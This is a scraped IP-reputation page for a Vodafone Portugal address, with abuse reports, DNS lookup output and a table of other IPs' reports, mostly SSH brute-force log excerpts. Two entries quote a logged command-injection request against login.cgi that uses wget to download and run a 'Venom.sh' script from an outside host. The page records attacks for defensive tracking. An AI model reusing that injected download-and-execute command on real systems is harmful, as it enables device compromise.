213.30.20.164 - IPInfo

Basic Info

City: unknown

Region: unknown

Country: Portugal

Internet Service Provider: Vodafone Portugal - Communicacoes Pessoais S.A.

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:

Make a comment on this IP

Type	Details	Datetime
attackbots	Scan or attack attempt on email service.	2019-07-04 03:31:18
attackspambots	Brute force attempt	2019-07-03 05:25:30

Comments on same subnet:

No discussion about this subnet yet..

Whois info:

Dig info:


; <<>> DiG 9.10.3-P4-Ubuntu <<>> 213.30.20.164
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 40891
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;213.30.20.164.			IN	A

;; AUTHORITY SECTION:
.			3600	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019042801 1800 900 604800 86400

;; Query time: 1 msec
;; SERVER: 67.207.67.3#53(67.207.67.3)
;; WHEN: Mon Apr 29 06:25:28 +08 2019
;; MSG SIZE  rcvd: 117

Host info

164.20.30.213.in-addr.arpa domain name pointer 164.20.30.213.rev.vodafone.pt.

Nslookup info:

Server:		67.207.67.3
Address:	67.207.67.3#53

Non-authoritative answer:
164.20.30.213.in-addr.arpa	name = 164.20.30.213.rev.vodafone.pt.

Authoritative answers can be found from:

Related IP info:

Related comments:

IP	Type	Details	Datetime
80.211.29.59	attack	Dec 23 05:14:10 h2421860 sshd[12972]: reveeclipse mapping checking getaddrinfo for host59-29-211-80.serverdedicati.aruba.hostname [80.211.29.59] failed - POSSIBLE BREAK-IN ATTEMPT! Dec 23 05:14:10 h2421860 sshd[12972]: Received disconnect from 80.211.29.59: 11: Bye Bye [preauth] Dec 23 05:14:10 h2421860 sshd[12974]: reveeclipse mapping checking getaddrinfo for host59-29-211-80.serverdedicati.aruba.hostname [80.211.29.59] failed - POSSIBLE BREAK-IN ATTEMPT! Dec 23 05:14:10 h2421860 sshd[12974]: Invalid user admin from 80.211.29.59 Dec 23 05:14:10 h2421860 sshd[12974]: Received disconnect from 80.211.29.59: 11: Bye Bye [preauth] Dec 23 05:14:11 h2421860 sshd[12976]: reveeclipse mapping checking getaddrinfo for host59-29-211-80.serverdedicati.aruba.hostname [80.211.29.59] failed - POSSIBLE BREAK-IN ATTEMPT! Dec 23 05:14:11 h2421860 sshd[12976]: Invalid user admin from 80.211.29.59 Dec 23 05:14:11 h2421860 sshd[12976]: Received disconnect from 80.211.29.59: 11: Bye Bye [pre........ -------------------------------	2019-12-23 16:12:45
222.186.190.2	attackspam	2019-12-23T07:35:18.012237abusebot-2.cloudsearch.cf sshd[7730]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.190.2 user=root 2019-12-23T07:35:19.199153abusebot-2.cloudsearch.cf sshd[7730]: Failed password for root from 222.186.190.2 port 16248 ssh2 2019-12-23T07:35:22.723693abusebot-2.cloudsearch.cf sshd[7730]: Failed password for root from 222.186.190.2 port 16248 ssh2 2019-12-23T07:35:18.012237abusebot-2.cloudsearch.cf sshd[7730]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.190.2 user=root 2019-12-23T07:35:19.199153abusebot-2.cloudsearch.cf sshd[7730]: Failed password for root from 222.186.190.2 port 16248 ssh2 2019-12-23T07:35:22.723693abusebot-2.cloudsearch.cf sshd[7730]: Failed password for root from 222.186.190.2 port 16248 ssh2 2019-12-23T07:35:18.012237abusebot-2.cloudsearch.cf sshd[7730]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhos ...	2019-12-23 15:39:03
114.67.80.209	attack	Dec 23 08:40:45 vps691689 sshd[18032]: Failed password for root from 114.67.80.209 port 45310 ssh2 Dec 23 08:49:53 vps691689 sshd[18287]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=114.67.80.209 ...	2019-12-23 15:50:28
197.36.34.220	attackbotsspam	1 attack on wget probes like: 197.36.34.220 - - [22/Dec/2019:23:57:52 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11	2019-12-23 15:56:27
128.199.142.0	attackbotsspam	$f2bV_matches	2019-12-23 15:48:22
193.112.219.176	attackspam	Dec 23 08:39:48 meumeu sshd[19571]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=193.112.219.176 Dec 23 08:39:51 meumeu sshd[19571]: Failed password for invalid user in from 193.112.219.176 port 51506 ssh2 Dec 23 08:44:37 meumeu sshd[20338]: Failed password for root from 193.112.219.176 port 35646 ssh2 ...	2019-12-23 15:58:12
218.75.216.20	attackspambots	Tried sshing with brute force.	2019-12-23 15:52:33
201.7.210.50	attack	10 attempts against mh-misc-ban on heat.magehost.pro	2019-12-23 16:14:30
205.185.127.36	attackspam	2019-12-23T08:24:44.164366vps751288.ovh.net sshd\[8450\]: Invalid user jenkins from 205.185.127.36 port 41372 2019-12-23T08:24:44.171593vps751288.ovh.net sshd\[8451\]: Invalid user tomcat from 205.185.127.36 port 41388 2019-12-23T08:24:44.175088vps751288.ovh.net sshd\[8444\]: Invalid user admin from 205.185.127.36 port 41392 2019-12-23T08:24:44.204845vps751288.ovh.net sshd\[8441\]: Invalid user vsftpd from 205.185.127.36 port 41394 2019-12-23T08:24:44.205571vps751288.ovh.net sshd\[8446\]: Invalid user postgres from 205.185.127.36 port 41398 2019-12-23T08:24:44.221861vps751288.ovh.net sshd\[8440\]: Invalid user ubuntu from 205.185.127.36 port 41352 2019-12-23T08:24:44.230676vps751288.ovh.net sshd\[8445\]: Invalid user vps from 205.185.127.36 port 41396	2019-12-23 15:49:00
35.185.108.246	attackbotsspam	Dec 23 08:20:42 vpn01 sshd[10200]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=35.185.108.246 Dec 23 08:20:44 vpn01 sshd[10200]: Failed password for invalid user magris from 35.185.108.246 port 58032 ssh2 ...	2019-12-23 16:00:48
185.245.87.208	attackspam	Fishing for exploits - /.env	2019-12-23 15:53:29
41.237.129.19	attackbots	1 attack on wget probes like: 41.237.129.19 - - [22/Dec/2019:04:20:27 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11	2019-12-23 15:50:47
93.46.16.98	attackbots	Telnet Server BruteForce Attack	2019-12-23 15:44:53
51.254.140.235	attackspam	Dec 23 08:02:22 nextcloud sshd\[28427\]: Invalid user kavaler from 51.254.140.235 Dec 23 08:02:22 nextcloud sshd\[28427\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=51.254.140.235 Dec 23 08:02:24 nextcloud sshd\[28427\]: Failed password for invalid user kavaler from 51.254.140.235 port 48322 ssh2 ...	2019-12-23 15:55:31
110.35.79.23	attack	Dec 23 08:43:52 markkoudstaal sshd[12263]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=110.35.79.23 Dec 23 08:43:54 markkoudstaal sshd[12263]: Failed password for invalid user admin from 110.35.79.23 port 54845 ssh2 Dec 23 08:49:26 markkoudstaal sshd[12706]: Failed password for root from 110.35.79.23 port 53897 ssh2	2019-12-23 15:56:11

Recently Reported IPs

220.164.2.120	103.28.38.166	220.171.48.39	60.169.65.62
207.46.13.91	78.10.223.136	77.81.230.10	77.81.229.70
121.204.148.98	153.37.22.155	198.211.114.208	220.178.109.10
118.244.196.89	116.125.220.29	23.252.175.89	188.234.216.99
179.185.17.106	180.153.242.98	170.82.246.208	216.244.66.240